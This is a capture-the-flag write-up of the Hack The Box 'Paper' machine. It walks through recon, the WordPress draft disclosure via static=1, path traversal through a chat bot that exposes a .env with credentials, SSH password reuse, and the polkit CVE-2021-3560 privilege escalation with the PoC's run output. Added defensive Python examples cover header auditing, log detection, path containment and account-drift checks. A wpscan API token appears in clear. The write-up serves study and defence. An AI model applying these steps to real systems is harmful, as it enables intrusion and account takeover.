Hack the Box — Paper
I did this box some time ago and it wasn’t as easy as I thought, although that was probably more because of my rush to get the flags and points to move up a level in HTB. The other reason I wanted to do it again was that, on those long night shifts, I watched Alh4zr3d’s video walkthrough and remembered how good it was. Based on the American Office, what else could you ask for!
So let’s get started, with the usual enumeration:
ping
ping -c 4 $IP
PING 10.129.136.31 (10.129.136.31) 56(84) bytes of data.
64 bytes from 10.129.136.31: icmp_seq=1 ttl=63 time=8.75 ms
64 bytes from 10.129.136.31: icmp_seq=2 ttl=63 time=8.48 ms
64 bytes from 10.129.136.31: icmp_seq=3 ttl=63 time=8.33 ms
64 bytes from 10.129.136.31: icmp_seq=4 ttl=63 time=8.08 ms

--- 10.129.136.31 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3005ms
rtt min/avg/max/mdev = 8.076/8.408/8.746/0.243 ms
nmap
~ nmap -sCV -A $IP -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-23 10:08 BST
Nmap scan report for 10.129.136.31
Host is up (0.017s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
| 256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_ 256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-title: HTTP Server Test Page powered by CentOS
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_ssl-date: TLS randomness does not represent time
| http-methods:
|_ Potentially risky methods: TRACE
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-title: HTTP Server Test Page powered by CentOS
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after: 2022-07-08T10:32:34
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| tls-alpn:
|_ http/1.1
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.92 seconds
gobuster
~ gobuster dir -u http://$IP -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.136.31
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/08/23 10:08:53 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 199]
/.htaccess (Status: 403) [Size: 199]
/.htpasswd (Status: 403) [Size: 199]
/cgi-bin/ (Status: 403) [Size: 199]
/manual (Status: 301) [Size: 236] [--> http://10.129.136.31/manual/]
===============================================================
2022/08/23 10:09:01 Finished
===============================================================
Gobuster didn’t turn up much on the first scan, so I used feroxbuster, which went a tad mad, to say the least!!
~ feroxbuster --url http://$IP --depth 2 --wordlist /usr/share/wordlists/wfuzz/general/megabeast.txt -e
 ___  ___  __   __   __      __         __   ___
|__  |__  |__) |__) | /  ` / \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.7.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.129.136.31
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/wfuzz/general/megabeast.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.7.1
💉 Config File │ /home/karti/.config/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 2
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200 GET 4l 13w 643c http://10.129.136.31/icons/poweredby.png
200 GET 27l 138w 5714c http://10.129.136.31/poweredby.png
403 GET 70l 2438w 199691c http://10.129.136.31/
200 GET 3l 18w 332c http://10.129.136.31/icons/index.png
200 GET 3l 21w 277c http://10.129.136.31/icons/pie5.png
200 GET 1l 13w 198c http://10.129.136.31/icons/pie1.gif
200 GET 2l 3w 131c http://10.129.136.31/icons/small/binhex.gif
Normally I take this (a 403 on the document root and only a default test page) as an indication that a change to /etc/hosts may be required. The nmap scan showed nothing other than localhost.localdomain, so a quick check of the site headers with curl gave an answer:
~ curl --head http://$IP
HTTP/1.1 403 Forbidden
Date: Tue, 23 Aug 2022 09:12:46 GMT
Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
X-Backend-Server: office.paper
Last-Modified: Sun, 27 Jun 2021 23:47:13 GMT
ETag: "30c0b-5c5c7fdeec240"
Accept-Ranges: bytes
Content-Length: 199691
Content-Type: text/html; charset=UTF-8
Looking at the X-Backend-Server header we can see office.paper, so a quick amendment to our hosts file should help:
127.0.0.1 localhost
127.0.1.1 kaliCTF
10.129.136.31 office.paper

# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
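The curl and wpscan output above is a good illustration of how much a server gives away in its response headers: the product versions in Server and X-Powered-By, and an internal hostname in X-Backend-Server. The following is an added example, not something from the box or from the write-up, that audits a raw response head for exactly those disclosures. The sample response is combined from the curl and wpscan output above (X-Powered-By moved into the same response), and the list of hostname-bearing headers is this example’s own assumption.

```python
# Added example (not from the write-up): audit raw HTTP response headers for
# the disclosures seen in the curl and wpscan output. The sample response is
# assembled from the headers shown on the page; HOSTNAME_HEADERS and the set of
# version-carrying headers are this example's own assumptions.
import re

SAMPLE_RESPONSE = """HTTP/1.1 403 Forbidden
Date: Tue, 23 Aug 2022 09:12:46 GMT
Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
X-Backend-Server: office.paper
X-Powered-By: PHP/7.2.24
Last-Modified: Sun, 27 Jun 2021 23:47:13 GMT
ETag: "30c0b-5c5c7fdeec240"
Accept-Ranges: bytes
Content-Length: 199691
Content-Type: text/html; charset=UTF-8
"""

# Headers that commonly carry an internal or backend hostname (assumed list).
HOSTNAME_HEADERS = {"x-backend-server", "x-served-by", "x-host", "x-forwarded-server"}
# Headers whose value is normally a product/version string (assumed list).
VERSION_HEADERS = {"server", "x-powered-by", "x-aspnet-version", "x-generator"}
# A "Product/1.2.3k" token: product name, slash, dotted version, optional letter.
VERSION_RE = re.compile(r"[A-Za-z_][\w.-]*/\d+(?:\.\d+)+[a-z]?")


def parse_headers(raw):
    """Split a raw HTTP response head into (status_line, {lower_name: value})."""
    lines = [line for line in raw.splitlines() if line.strip()]
    status = lines[0]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def audit_headers(raw):
    """Return (header_name, finding) pairs for every disclosure in the response."""
    _, headers = parse_headers(raw)
    findings = []
    for name, value in headers.items():
        if name in HOSTNAME_HEADERS:
            findings.append((name, f"names a backend host: {value}"))
        if name in VERSION_HEADERS:
            versions = VERSION_RE.findall(value)
            if versions:
                findings.append((name, "exposes component versions: " + ", ".join(versions)))
    return findings


def leaked_hostnames(raw):
    """Just the hostnames, sorted, for feeding into a vhost or hosts-file check."""
    _, headers = parse_headers(raw)
    return sorted(headers[h] for h in HOSTNAME_HEADERS if h in headers)


if __name__ == "__main__":
    for header, finding in audit_headers(SAMPLE_RESPONSE):
        print(f"{header}: {finding}")
```

On the defending side each of these findings has a one-line fix: ServerTokens Prod in the Apache configuration trims the Server header to "Apache", expose_php = Off in php.ini drops X-Powered-By, and a custom header such as X-Backend-Server can be removed with mod_headers (Header unset X-Backend-Server) at the edge. None of that stops a determined tester, but it removes the free hint that led straight to the virtual host here.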
So running gobuster a second time we have a bit more success, with some indications that we have a WordPress site:
===============================================================
/.hta (Status: 403) [Size: 199]
/.htpasswd (Status: 403) [Size: 199]
/.htaccess (Status: 403) [Size: 199]
/cgi-bin/ (Status: 403) [Size: 199]
/index.php (Status: 301) [Size: 1] [--> http://office.paper/]
/manual (Status: 301) [Size: 235] [--> http://office.paper/manual/]
/wp-admin (Status: 301) [Size: 237] [--> http://office.paper/wp-admin/]
/wp-content (Status: 301) [Size: 239] [--> http://office.paper/wp-content/]
/wp-includes (Status: 301) [Size: 240] [--> http://office.paper/wp-includes/]
===============================================================
website
Going through the usual button clicking, checking links and other such wonderful enumeration processes, we find that it is running a blog with a number of posts, which could indicate a number of users:
- Prisonmike
- nick
- Creed Bratton
All characters from the series. One of the comments from Nick did stand out:
Possible way in? So far we have not enumerated WordPress. Let’s see what it gives us.
~ wpscan --url http://office.paper --api-token nWR63QdtvFSaOBYXjRz2b2bFRZEYQ7QoL82juJHYsQQ
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://office.paper/ [10.129.136.31]
[+] Started: Tue Aug 23 11:03:28 2022

Interesting Finding(s):

[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| - X-Powered-By: PHP/7.2.24
| - X-Backend-Server: office.paper
| Found By: Headers (Passive Detection)
| Confidence: 100%
[!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
| Fixed in: 5.2.4
| References:
| - https://wpscan.com/vulnerability/3413b879-785f-4c9f-aa8a-5a4a1d5e0ba2
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17671
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://blog.wpscan.com/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
| - https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308
| - https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
Having just seen nick’s comment about the drafts, we see that there is an available exploit to view Prisonmike’s draft posts. Checking the wpscan web link we get the information required:
Trying with order=asc gave us a 404 page error, so I removed it, keeping static=1, which provided us with Prisonmike’s drafts.
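Two things a site owner would want from this finding are a quick way to tell whether a given WordPress core version predates the 5.2.4 fix, and a way to spot the technique in the web server logs afterwards. The block below is an added example, not code from the box, wpscan or WordPress: it compares a version string against the fixed-in version reported above, and scans Apache combined-format access log lines for requests that carry the static=1 query parameter the disclosure relies on. The log lines are constructed for this example, and treating static=1 on a front-end request as the signature is this example’s own heuristic.

```python
# Added example (not from the write-up): defender-side checks for the
# CVE-2019-17671 draft disclosure wpscan reported. FIXED_IN comes from the
# wpscan output; the log lines are constructed and the query-string heuristic
# is this example's own assumption about what an attempt looks like.
import re
from urllib.parse import parse_qs, urlsplit

FIXED_IN = "5.2.4"


def version_tuple(version):
    """'5.2.3' -> (5, 2, 3). Plain numeric core versions only."""
    return tuple(int(part) for part in version.split("."))


def vulnerable_to_draft_disclosure(wp_version):
    """True when the core version predates the fix in 5.2.4."""
    return version_tuple(wp_version) < version_tuple(FIXED_IN)


# Constructed Apache combined-log lines: two probes with static=1 (one with
# the order=asc variant that the write-up says returned a 404) and two
# ordinary requests that must not be flagged.
SAMPLE_LOG = """\
10.10.14.5 - - [23/Aug/2022:11:05:10 +0100] "GET /?static=1 HTTP/1.1" 200 10234 "-" "Mozilla/5.0"
10.10.14.5 - - [23/Aug/2022:11:05:12 +0100] "GET /?static=1&order=asc HTTP/1.1" 404 196 "-" "Mozilla/5.0"
10.10.14.9 - - [23/Aug/2022:11:06:02 +0100] "GET /?p=12 HTTP/1.1" 200 23432 "-" "Mozilla/5.0"
10.10.14.9 - - [23/Aug/2022:11:06:40 +0100] "GET /wp-includes/css/dist/block-library/style.min.css?ver=5.2.3 HTTP/1.1" 200 5031 "-" "Mozilla/5.0"
"""

# Enough of the combined format to get client IP, timestamp, request target and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def draft_view_attempts(log_text):
    """Return (ip, timestamp, target, status) for requests carrying static=1.

    A 200 here on a pre-5.2.4 site means the drafts were served; a 404 still
    records that somebody tried.
    """
    hits = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        query = parse_qs(urlsplit(match["target"]).query)
        if query.get("static") == ["1"]:
            hits.append((match["ip"], match["ts"], match["target"], int(match["status"])))
    return hits


if __name__ == "__main__":
    print("5.2.3 vulnerable:", vulnerable_to_draft_disclosure("5.2.3"))
    for hit in draft_view_attempts(SAMPLE_LOG):
        print("draft view attempt:", hit)
```

The version check is deliberately simple (it only understands dotted numeric core versions), which is all the wpscan finding needs; the real fix is updating core, since the draft leak is in WordPress itself rather than in a plugin or theme.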
This provided us with a sub-domain, chat. Adding this to our hosts file allowed us to access the registration page.
Having registered we now have access to the office chat app.
We see that it has a bot running and its name is Recyclops — another chapter from the series, where Dwight plays the actual character. The room itself is read only, but we can start a direct message with Recyclops.
So using the commands from the original team chat, we can ask specific questions. Let’s see if we can get Local File Inclusion (LFI):
So that works. Checking which users were available in /home, we see only dwight. Checking his files, I noticed that hubot (which I assumed was part of the Recyclops program) provided us with an environment file, .env:
<!=====Contents of file ../../../../../home/dwight/hubot/.env=====>
export ROCKETCHAT_URL='http://127.0.0.1:48320'
export ROCKETCHAT_USER=recyclops
export ROCKETCHAT_PASSWORD=Que********3s!23
export ROCKETCHAT_USESSL=false
export RESPOND_TO_DM=true
export RESPOND_TO_EDITED=true
export PORT=8000
export BIND_ADDRESS=127.0.0.1
<!=====End of file ../../../../../home/dwight/hubot/.env=====>
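The root cause here is a bot command that joins a user-supplied name onto its file directory without checking where the result ends up, so ../ segments walk out of the sales folder and into dwight’s home. The block below is an added example, not hubot’s code or anything from the box: it shows the containment check such a command needs, resolving the requested path and confirming it still sits under the intended base directory. The base directory path is this example’s assumption; the traversal string is the one from the .env dump above.

```python
# Added example (not from hubot or the box): confine a user-supplied file name
# to the directory a bot command is meant to serve. SALES_DIR is an assumed
# location; the traversal string in the demo is the one from the write-up.
import os

SALES_DIR = "/home/dwight/sales"  # assumed: where the bot's files are supposed to live


class PathEscapeError(ValueError):
    """Raised when a requested name resolves outside the allowed base directory."""


def resolve_inside(base, requested):
    """Return the absolute path for `requested`, or raise if it leaves `base`.

    realpath() collapses '..' segments (and follows symlinks for paths that
    exist), so the comparison is made on the final target rather than on the
    raw string. An absolute `requested` replaces `base` in os.path.join, which
    is exactly why the containment check afterwards is the thing that matters.
    """
    base_real = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base_real, requested))
    if os.path.commonpath([base_real, target]) != base_real:
        raise PathEscapeError(f"{requested!r} resolves outside {base}")
    return target


def is_safe_request(requested, base=SALES_DIR):
    """Convenience wrapper: True if the bot may serve this name, False otherwise."""
    try:
        resolve_inside(base, requested)
        return True
    except PathEscapeError:
        return False


def read_served_file(requested, base=SALES_DIR):
    """What the bot's 'file' command should do: resolve, check, then open."""
    path = resolve_inside(base, requested)
    with open(path, "rb") as handle:
        return handle.read()


if __name__ == "__main__":
    for name in ["2021/quarterly.txt", "../../../../../home/dwight/hubot/.env", "/etc/passwd"]:
        print(f"{name!r:50} allowed={is_safe_request(name)}")
```

Two further points follow from the dump itself: the bot account’s credentials were sitting in a plaintext .env inside a home directory the bot could read from, and that password was then reused for an interactive account. Keeping service credentials out of readable files (or at least out of the tree the service can list), and never sharing them with a human login, would have broken this chain even with the traversal bug present.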
This gave us a username and password. Perhaps he used the same password?
~ ssh dwight@$IP
The authenticity of host '10.129.136.31 (10.129.136.31)' can't be established.
ED25519 key fingerprint is SHA256:9utZz963ewD/13oc9IYzRXf6sUEX4xOe/iUaMPTFInQ.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.136.31' (ED25519) to the list of known hosts.
dwight@10.129.136.31's password:
Activate the web console with: systemctl enable --now cockpit.socket

Last login: Tue Feb 1 09:14:33 2022 from 10.10.14.23
[dwight@paper ~]$
A quick check proved he did!! So now we have the user flag:
8bc3*******************49948d18
privilege escalation
Checking sudo -l and looking for SUID binaries doesn’t get us much, with dwight unable to run sudo. A quick transfer of linpeas brings us the good news that it is actually vulnerable to CVE-2021-3560.
Some research brings up the details of the exploit and a script to actually gain root.
So copying the poc.sh and pasting it into the target /tmp folder:
We make it executable and then run it.
[dwight@paper tmp]$ ./poc.sh -p=password

[!] Username set as : secnigma
[!] No Custom Timing specified.
[!] Timing will be detected Automatically
[!] Force flag not set.
[!] Vulnerability checking is ENABLED!
[!] Starting Vulnerability Checks...
[!] Checking distribution...
[!] Detected Linux distribution as "centos"
[!] Checking if Accountsservice and Gnome-Control-Center is installed
[+] Accounts service and Gnome-Control-Center Installation Found!!
[!] Checking if polkit version is vulnerable
[+] Polkit version appears to be vulnerable!!
[!] Starting exploit...
[!] Inserting Username secnigma...
Error org.freedesktop.Accounts.Error.PermissionDenied: Authentication is required
[+] Inserted Username secnigma with UID 1005!
[!] Inserting password hash...
[!] It looks like the password insertion was succesful!
[!] Try to login as the injected user using su - secnigma
[!] When prompted for password, enter your password
[!] If the username is inserted, but the login fails; try running the exploit again.
[!] If the login was succesful,simply enter 'sudo bash' and drop into a root shell!
[dwight@paper tmp]$ su secnigma
Password:
[secnigma@paper tmp]$ sudo bash
[sudo] password for secnigma:
[root@paper tmp]# id
uid=0(root) gid=0(root) groups=0(root)
[root@paper tmp]# cat /root/root.txt
a6a1b5a********************c1d22
[root@paper tmp]#
As mentioned in the POC readme file, this took a few attempts to work. However, when it did, it gave us straight access to root and the flag.
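What the polkit exploit leaves behind is visible in the account database: a brand-new local user (secnigma, UID 1005 in the output above) that can immediately sudo to root. The block below is an added example, not part of the write-up or of the PoC, showing the check a responder would run on a host like this one: diff the current /etc/passwd and /etc/group against a recorded baseline and report new accounts and new members of the administrative group (wheel on CentOS). Both the baseline and the current file contents are constructed for this example, and dwight’s UID in them is made up.

```python
# Added example (not from the write-up or the PoC): detect the account
# injection a CVE-2021-3560 exploit performs by comparing /etc/passwd and
# /etc/group against a known-good baseline. All file contents below are
# constructed; dwight's UID is an assumed value, secnigma's is from the page.
BASELINE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin
dwight:x:1004:1004::/home/dwight:/bin/bash
"""
CURRENT_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin
dwight:x:1004:1004::/home/dwight:/bin/bash
secnigma:x:1005:1005:secnigma:/home/secnigma:/bin/bash
"""
BASELINE_GROUP = """\
root:x:0:
wheel:x:10:
dwight:x:1004:
"""
CURRENT_GROUP = """\
root:x:0:
wheel:x:10:secnigma
dwight:x:1004:
secnigma:x:1005:
"""


def parse_passwd(text):
    """Map username -> (uid, shell) for every passwd entry."""
    users = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, uid, _gid, _gecos, _home, shell = line.split(":")
        users[name] = (int(uid), shell)
    return users


def group_members(text, group="wheel"):
    """Set of supplementary members of `group` from /etc/group content."""
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[0] == group:
            return set(filter(None, fields[3].split(",")))
    return set()


def account_drift(baseline_passwd, current_passwd, baseline_group, current_group,
                  admin_group="wheel"):
    """Report accounts and admin-group members present now but not in the baseline."""
    before, after = parse_passwd(baseline_passwd), parse_passwd(current_passwd)
    new_users = sorted(set(after) - set(before))
    # Interactive accounts are the ones worth an immediate look.
    new_login_users = [u for u in new_users if not after[u][1].endswith("nologin")]
    new_admins = sorted(group_members(current_group, admin_group)
                        - group_members(baseline_group, admin_group))
    return {
        "new_users": new_users,
        "new_login_users": new_login_users,
        "new_admin_members": new_admins,
    }


if __name__ == "__main__":
    for key, value in account_drift(BASELINE_PASSWD, CURRENT_PASSWD,
                                    BASELINE_GROUP, CURRENT_GROUP).items():
        print(f"{key}: {value}")
```

In practice the baseline would be a copy of both files taken at build time (or pulled from configuration management), and the same diff belongs in whatever periodic integrity check the host already runs; an unexplained new wheel member is a high-confidence signal regardless of which bug created it. Patching polkit closes this particular route, but the account diff catches the outcome rather than the mechanism.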
An enjoyable challenge that was much better the second time around. As a side note, the box creator secnigma actually provided the GitHub POC used to exploit the target.